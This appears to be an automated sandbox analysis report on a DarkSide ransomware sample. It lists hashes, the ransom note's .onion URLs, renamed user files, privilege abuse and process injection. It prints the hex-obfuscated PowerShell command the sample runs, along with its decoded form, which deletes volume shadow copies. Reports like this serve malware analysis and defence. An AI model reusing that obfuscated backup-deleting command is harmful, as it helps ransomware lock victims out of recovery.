Analysis
- max time kernel: 93s
- max time network: 94s
- platform: windows7_x64
- resource: win7v20210410
- submitted: 11-05-2021 04:26
Static task: static1
Behavioral task: behavioral1
- Sample: 3.exe
- Resource: win7v20210410
Behavioral task: behavioral2
- Sample: 3.exe
- Resource: win10v20210408
General
- Target: 3.exe
- Size: 17KB
- MD5: 9009593ebf5ea20407ab19bff045dc9d
- SHA1: 03c1f7458f3983c03a0f8124a01891242c3cc5df
- SHA256: 6931b124d38d52bd7cdef48121fda457d407b63b59bb4e6ead4ce548f4bbb971
- SHA512: fe24a401b35a5b1874bc90739f6fda1969456a13e1339f5b920e6fa659e82df0febc7fc3196ea854601e8773c356884a2516b660daafa944c3643b9d0be74fed
Malware Config
Extracted from: C:\\README.7c0d2b67.TXT
- Family: darkside
- URLs:
  http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC
  http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68
Signatures
- DarkSide
  Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
- Modifies extensions of user files (9 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Processes: 3.exe
  description | ioc | process
  File renamed | C:\Users\Admin\Pictures\CompressEnter.crw => C:\Users\Admin\Pictures\CompressEnter.crw.7c0d2b67 | 3.exe
  File opened for modification | C:\Users\Admin\Pictures\MoveInstall.png.7c0d2b67 | 3.exe
  File renamed | C:\Users\Admin\Pictures\MoveRequest.tif => C:\Users\Admin\Pictures\MoveRequest.tif.7c0d2b67 | 3.exe
  File renamed | C:\Users\Admin\Pictures\UseUpdate.tiff => C:\Users\Admin\Pictures\UseUpdate.tiff.7c0d2b67 | 3.exe
  File opened for modification | C:\Users\Admin\Pictures\CompressEnter.crw.7c0d2b67 | 3.exe
  File renamed | C:\Users\Admin\Pictures\MoveInstall.png => C:\Users\Admin\Pictures\MoveInstall.png.7c0d2b67 | 3.exe
  File opened for modification | C:\Users\Admin\Pictures\MoveRequest.tif.7c0d2b67 | 3.exe
  File opened for modification | C:\Users\Admin\Pictures\UseUpdate.tiff | 3.exe
  File opened for modification | C:\Users\Admin\Pictures\UseUpdate.tiff.7c0d2b67 | 3.exe
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes: 3.exe, powershell.exe
  pid | process
  1672 | 3.exe
  1672 | 3.exe
  1604 | powershell.exe
  1604 | powershell.exe
  1672 | 3.exe
- Suspicious use of AdjustPrivilegeToken (24 IoCs)
  Processes: 3.exe, powershell.exe, vssvc.exe
  description | pid | process
  Token: SeIncreaseQuotaPrivilege | 1672 | 3.exe
  Token: SeSecurityPrivilege | 1672 | 3.exe
  Token: SeTakeOwnershipPrivilege | 1672 | 3.exe
  Token: SeLoadDriverPrivilege | 1672 | 3.exe
  Token: SeSystemProfilePrivilege | 1672 | 3.exe
  Token: SeSystemtimePrivilege | 1672 | 3.exe
  Token: SeProfSingleProcessPrivilege | 1672 | 3.exe
  Token: SeIncBasePriorityPrivilege | 1672 | 3.exe
  Token: SeCreatePagefilePrivilege | 1672 | 3.exe
  Token: SeBackupPrivilege | 1672 | 3.exe
  Token: SeRestorePrivilege | 1672 | 3.exe
  Token: SeShutdownPrivilege | 1672 | 3.exe
  Token: SeDebugPrivilege | 1672 | 3.exe
  Token: SeSystemEnvironmentPrivilege | 1672 | 3.exe
  Token: SeRemoteShutdownPrivilege | 1672 | 3.exe
  Token: SeUndockPrivilege | 1672 | 3.exe
  Token: SeManageVolumePrivilege | 1672 | 3.exe
  Token: 33 | 1672 | 3.exe
  Token: 34 | 1672 | 3.exe
  Token: 35 | 1672 | 3.exe
  Token: SeDebugPrivilege | 1604 | powershell.exe
  Token: SeBackupPrivilege | 764 | vssvc.exe
  Token: SeRestorePrivilege | 764 | vssvc.exe
  Token: SeAuditPrivilege | 764 | vssvc.exe
- Suspicious use of WriteProcessMemory (4 IoCs)
  Processes: 3.exe
  description | pid | process | target process
  PID 1672 wrote to memory of 1604 | 1672 | 3.exe | powershell.exe
  PID 1672 wrote to memory of 1604 | 1672 | 3.exe | powershell.exe
  PID 1672 wrote to memory of 1604 | 1672 | 3.exe | powershell.exe
  PID 1672 wrote to memory of 1604 | 1672 | 3.exe | powershell.exe
Processes
- C:\Users\Admin\AppData\Local\Temp\3.exe (depth 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\3.exe"
  - Modifies extensions of user files
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2, child of 3.exe)
    Command line: powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
    Decoded hex payload: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} (deletes volume shadow copies; this is what triggers the vssvc.exe activity below)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\vssvc.exe (depth 1)
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
  MD5: aff3f177f0b4afda2803cf7bf5a4b506
  SHA1: 71d2bbc11c2ba1c6bf4f7a43ababa9518a09abef
  SHA256: 03a21a36eb9b71c76573a61d93a5259485c62e16a98b23fde6f194c0f68f24b9
  SHA512: 3a4d1ea33b1da55e5e8515a9581997972d84f3c29da7bdda1f8309afa3a5eb0f532d07e80533900487ebdd2d7b402289c6e7a4cd30935c0935c11cce2efda5e5
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  MD5: 38ed2d03c9b5bb415015840d055a9341
  SHA1: 5cb0b8ce0ff56591025faf9f837f0431bb72a14c
  SHA256: cdec19d6b5917f38e50316d7fbe5d393f696529a9f838df4a391ed554dbf3abf
  SHA512: 9322584c977166024962e961fe5baf35418e8275604e29b547ccf27636e8dee82fe0c0dd591012d65d1bedb9dcdc214a855a0b0c7ad9b1307250b00f28c847d8
- memory/1604-65-0x000000001A920000-0x000000001A922000-memory.dmp (Filesize: 8KB)
- memory/1604-62-0x0000000002710000-0x0000000002711000-memory.dmp (Filesize: 4KB)
- memory/1604-63-0x000000001A9A0000-0x000000001A9A1000-memory.dmp (Filesize: 4KB)
- memory/1604-64-0x0000000002750000-0x0000000002751000-memory.dmp (Filesize: 4KB)
- memory/1604-66-0x000000001A924000-0x000000001A926000-memory.dmp (Filesize: 8KB)
- memory/1604-67-0x0000000002370000-0x0000000002371000-memory.dmp (Filesize: 4KB)
- memory/1604-68-0x000000001C010000-0x000000001C011000-memory.dmp (Filesize: 4KB)
- memory/1604-69-0x000000001C250000-0x000000001C251000-memory.dmp (Filesize: 4KB)
- memory/1604-61-0x000007FEFBE41000-0x000007FEFBE43000-memory.dmp (Filesize: 8KB)
- memory/1604-60-0x0000000000000000-mapping.dmp
- memory/1672-59-0x0000000075971000-0x0000000075973000-memory.dmp (Filesize: 8KB)